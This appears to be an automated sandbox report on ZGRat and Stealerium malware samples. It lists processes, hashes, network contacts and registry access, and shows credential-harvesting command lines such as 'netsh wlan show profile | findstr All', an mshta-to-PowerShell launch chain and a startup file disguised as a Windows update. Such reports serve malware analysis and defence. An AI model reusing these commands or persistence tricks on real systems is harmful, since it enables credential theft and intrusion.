memory/3580-20-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-18-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-16-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-12-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-10-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-6-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-1-0x0000020FD5C80000-0x0000020FD5DE2000-memory.dmp

memory/3580-936-0x0000020FBD3A0000-0x0000020FBD3A1000-memory.dmp

memory/3580-935-0x0000020FD5C70000-0x0000020FD5C80000-memory.dmp

memory/3580-938-0x0000020FD5DE0000-0x0000020FD5E2C000-memory.dmp

memory/3580-937-0x0000020FD5B30000-0x0000020FD5C28000-memory.dmp

memory/1596-942-0x0000000140000000-0x00000001400D0000-memory.dmp

memory/1596-945-0x000001E14EE80000-0x000001E14EF8A000-memory.dmp

memory/1596-944-0x00007FF813890000-0x00007FF814351000-memory.dmp

memory/3580-943-0x00007FF813890000-0x00007FF814351000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Walter.exe.log

MD5 9f5d0107d96d176b1ffcd5c7e7a42dc9
SHA1 de83788e2f18629555c42a3e6fada12f70457141
SHA256 d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097
SHA512 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

memory/1596-3162-0x000001E14F030000-0x000001E14F0CE000-memory.dmp

memory/1596-3163-0x00007FF813890000-0x00007FF814351000-memory.dmp

memory/1596-3164-0x000001E14F020000-0x000001E14F030000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

16s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4824 set thread context of 1540 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 172.67.162.192:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 192.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
GB 96.17.179.12:80 tcp

Files

memory/4824-0-0x00000000009D0000-0x00000000009E4000-memory.dmp

memory/4824-1-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/4824-2-0x0000000005550000-0x0000000005560000-memory.dmp

memory/4824-3-0x0000000002EA0000-0x0000000002EA6000-memory.dmp

memory/4824-4-0x0000000006E90000-0x000000000709A000-memory.dmp

memory/4824-5-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-8-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-10-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-6-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-14-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-16-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-18-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-20-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-24-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-26-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-28-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-30-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-22-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-32-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-34-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-38-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-40-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-36-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-42-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-44-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-46-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-50-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-52-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-56-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-54-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-58-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-60-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-62-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-64-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-48-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-68-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-66-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-12-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-937-0x0000000002DE0000-0x0000000002DE1000-memory.dmp

memory/4824-939-0x0000000007320000-0x000000000736C000-memory.dmp

memory/4824-938-0x0000000007430000-0x00000000075D2000-memory.dmp

memory/4824-940-0x0000000007C00000-0x00000000081A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\building.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/4824-947-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1540-946-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/1540-945-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1540-944-0x0000000000400000-0x0000000000592000-memory.dmp

memory/1540-948-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-953-0x0000000006000000-0x0000000006008000-memory.dmp

memory/1540-952-0x0000000005FD0000-0x0000000005FF6000-memory.dmp

memory/1540-951-0x0000000005F40000-0x0000000005FD2000-memory.dmp

memory/1540-955-0x0000000006E30000-0x0000000006E38000-memory.dmp

memory/1540-956-0x0000000006E50000-0x0000000006E6E000-memory.dmp

memory/1540-954-0x0000000006E20000-0x0000000006E2A000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/1540-1012-0x0000000006F30000-0x0000000006FC2000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Process.txt

MD5 bf20b12d771f890a397436385c1bece5
SHA1 a4591d040c4a3cabf4d6273179cf498db097a3fd
SHA256 837fd30d574b109158bcba06387dbfad22c330f7742bb29c8f5c2e19d8f76e53
SHA512 0e490228e2982e1e61384288a98d8c66535374b40601400e8e5a9c0c26421d2bf61de7e432b838be032cbb04b478fce39270275bdff7c48a9e2fc4a64871f9b8

memory/1540-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-1111-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-1147-0x0000000007080000-0x00000000070FA000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt

MD5 027a2c6780dfc5777707fc9fe796f5d6
SHA1 3add6e59894483c20d09b4dd8623fa42a252495e
SHA256 a19c1057e41ab8a3bc591f4d3ca2fb0a58f9fd34a300084580e14aa214fb3dc1
SHA512 fcede40cc3f6181b0c59849e966cf03324f305d6b38c05c21c8dacd5ac73a96178654871d39b903f0ffed6ae88ed5a9097a87e8d42544c621609c8767db245c4

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt

MD5 906c700315ca80c7952b464f3f93723f
SHA1 a736b7cdea92db2e686737c4567b86c22ef66e3f
SHA256 c55a28b0b4773dad67a0ea894c080d2398a0e686f1c355cedb7f7291637476e5
SHA512 af133b667e92cdab4e352b4c86ea7e8986ea9de5e25e61da92a61abe59adb11435d1e44d7e54974c2969c046db1fe1b411186b1578c147829cbb2d5693ffe35c

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

memory/1540-1220-0x0000000007240000-0x00000000072F2000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Debug.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/1540-1222-0x00000000071D0000-0x00000000071F2000-memory.dmp

memory/1540-1223-0x0000000008930000-0x0000000008C84000-memory.dmp

memory/1540-1225-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1540-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp

C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\msgid.dat

MD5 13272090fc49070d4c79f78670b7839b
SHA1 4ea6e614dd113ed7bb5e291537ceed50154f5042
SHA256 bc91f49e63aa1e5f230c79de3f60aeae2b561531e263e0799efe03b3bb407c84
SHA512 27ffb2c8e2a1af82b4ca472eb1a17221ef73f957a79403cf575c749f82aadc57766191076f2da4eee02d4db5785f0d9180294fc3c32a4f98d5fa91549c1e5d4a

memory/1540-1237-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

memory/1540-1238-0x00000000057C0000-0x00000000057D0000-memory.dmp

memory/1540-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

153s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealerium

stealer stealerium

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\xw.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1012 set thread context of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\xw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\loaderX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1988 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 4284 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 4284 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 4284 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 1012 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Roaming\xw.exe
PID 3080 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3080 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\loaderX.exe
PID 3080 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3080 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3080 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Roaming\xw.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 3144 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 3144 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Windows\SysWOW64\cmd.exe
PID 1132 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1132 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1132 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1132 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1132 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1132 wrote to memory of 4780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1132 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1132 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1132 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
